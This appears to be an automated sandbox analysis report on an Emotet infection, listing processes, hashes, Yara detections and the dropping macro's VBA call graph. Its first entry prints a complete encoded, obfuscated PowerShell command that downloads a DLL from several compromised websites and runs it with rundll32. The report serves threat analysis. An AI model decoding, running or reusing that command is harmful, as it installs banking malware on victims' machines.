Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2548 Parent PID: 2288

General

Start time:	08:48:41
Start date:	06/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
Imagebase:	0x13f590000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096289799.0000000001BD6000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2848 Parent PID: 2548

General

Start time:	08:48:44
Start date:	06/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Imagebase:	0xff2c0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 960 Parent PID: 2848

General

Start time:	08:48:45
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Imagebase:	0xa40000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2836 Parent PID: 960

General

Start time:	08:48:46
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
Imagebase:	0xa40000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2932 Parent PID: 2836

General

Start time:	08:48:47
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
Imagebase:	0xa40000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3068 Parent PID: 2932

General

Start time:	08:48:48
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
Imagebase:	0xa40000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2864 Parent PID: 3068

General

Start time:	08:48:49
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
Imagebase:	0xa40000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Oi5oelv0_s4

Declaration

Line	Content
1	Attribute VB_Name = "Oi5oelv0_s4"

Executed Functions

Function Dn5440l_hb7, APIs: 624, Strings: 66, Number of lines: 195, Relevance: 1394.195

APIs	Meta Information
P1x1ag4qbt2iq
Item
Swvko0y1qshqgm_
EajdMLeD
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
qpOWEIHHA
Close
yjNpyrf
SynsDAgHG
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
fUGQf
Close
gglHam
reTrs
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
ukrnIFCE
Close
syDRd
wuKBFvqI
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
VwnpBElhO
Close
RvFOAEPH
Mid
Name
Application
vitXEH
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
